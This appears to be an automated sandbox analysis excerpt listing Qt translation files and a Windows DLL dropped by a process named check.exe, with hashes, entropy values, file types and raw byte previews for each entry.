                                                                                                                                                                                                            SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                            MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                            SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                            SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                            SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):189580
                                                                                                                                                                                                            Entropy (8bit):4.630160941635514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                            MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                            SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                            SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                            SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):138690
                                                                                                                                                                                                            Entropy (8bit):5.515748942553918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                            MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                            SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                            SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                            SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160494
                                                                                                                                                                                                            Entropy (8bit):4.831791320613137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                            MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                            SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                            SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                            SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161172
                                                                                                                                                                                                            Entropy (8bit):4.680034416311688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                            MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                            SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                            SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                            SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):129911
                                                                                                                                                                                                            Entropy (8bit):5.802855391832282
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                            MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                            SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                            SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                            SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):156799
                                                                                                                                                                                                            Entropy (8bit):5.859529082176036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                            MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                            SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                            SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                            SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153608
                                                                                                                                                                                                            Entropy (8bit):4.843805801051326
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                            MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                            SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                            SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                            SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162982
                                                                                                                                                                                                            Entropy (8bit):4.841899887077422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                            MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                            SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                            SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                            SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):203767
                                                                                                                                                                                                            Entropy (8bit):5.362551648909705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                            MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                            SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                            SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                            SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):125763
                                                                                                                                                                                                            Entropy (8bit):4.80343609423322
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                            MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                            SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                            SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                            SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194487
                                                                                                                                                                                                            Entropy (8bit):4.877239354585035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                            MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                            SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                            SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                            SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):158274
                                                                                                                                                                                                            Entropy (8bit):5.402056706327934
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                            MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                            SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                            SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                            SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):127849
                                                                                                                                                                                                            Entropy (8bit):5.83455389078597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                            MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                            SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                            SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                            SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2483712
                                                                                                                                                                                                            Entropy (8bit):6.241719144701645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                            MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                            SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                            SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                            SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
